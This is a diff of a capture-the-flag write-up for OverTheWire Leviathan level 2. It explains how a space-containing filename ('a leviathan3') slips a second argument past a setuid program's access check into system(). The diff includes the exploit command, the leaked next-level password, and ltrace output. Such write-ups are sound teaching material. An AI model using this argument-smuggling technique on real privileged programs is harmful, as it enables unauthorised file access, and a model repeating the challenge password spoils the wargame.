tunedin-ctrl/overthewire-wargames/leviathan/leviathan2.md

 +++ exited (status 0) +++
 ```

-From this, the sequence seems to be:
+From the above calls, the sequence seems to be:
     - Check if the file is accessible (access).
     - Store the command in a buffer (snprintf).
     - Change the user ID (geteuid and setreuid).
     - Execute the command (system).

-From this, we need to somehow bypass the access check so that we can execute the command with elevated permissions (likely leviathan3).
+From this, we still need to somehow bypass the access check so that we can execute the command with elevated permissions (likely leviathan3).

-So, we need to make a temporary file to call the `./printfile`
-executable.
-So, I made my temp folder with `mktemp -d` and stored a test file called `file.txt`.

-However, what is strange to me is that `printfile` cannot execute my `file.txt` that is under the tmp file even with the same permissions.
-I even gave permissions like `chmod 777` to the test file which does not work.

-After googling, the correct way to do it is to create a payload like so: `touch '<tmpDir>/a leviathan3'` and switch directory to where the password is stored and call the printfile command there and you'll get the output like so:
+The vulnerability lies in the way the printfile program processes filenames.
+Since the program concatenates the filename directly into the command it will execute, we can manipulate the filename to modify the command.
+The payload was designed in the form of a filename.
+By adding a space character followed by the desired file we want to access, we can make the system function execute the cat command on both files.
+So, by naming our file as `a leviathan3`, the `printfile` executable attempts to read both the files, a and leviathan3.
 ```
 leviathan2@gibson:/etc/leviathan_pass$ ~/printfile '/tmp/tmp.0wDX4pzYkj/a leviathan3'
 /bin/cat: /tmp/tmp.0wDX4pzYkj/a: Permission denied
 Q0G8j4sakn
 ```

-So, what I have learnt: you can use a filename as a payload with the file you want to bypass certain functions.
-Using filenames as payloads can be a powerful method to exploit poorly written programs.
-So, we need to sanitize and validate inputs, even if they're filenames.
-This can be seen in the `ltrace`:
+Code signals in `ltrace`:
 ```
 leviathan2@gibson:/etc/leviathan_pass$ ltrace ~/printfile '/tmp/tmp.0wDX4pzYkj/a leviathan3'
 __libc_start_main(0x80491e6, 2, 0xffffd644, 0 <unfinished ...>
-access("/tmp/tmp.0wDX4pzYkj/a leviathan3"..., 4)                                                                                    = 0         acess is bypassed with the filename wow
+access("/tmp/tmp.0wDX4pzYkj/a leviathan3"..., 4)                                                                                    = 0         access is bypassed with the filename
 snprintf("/bin/cat /tmp/tmp.0wDX4pzYkj/a l"..., 511, "/bin/cat %s", "/tmp/tmp.0wDX4pzYkj/a leviathan3"...)                          = 41
 geteuid()                                                                                                                           = 12002
 geteuid()                                                                                                                           = 12002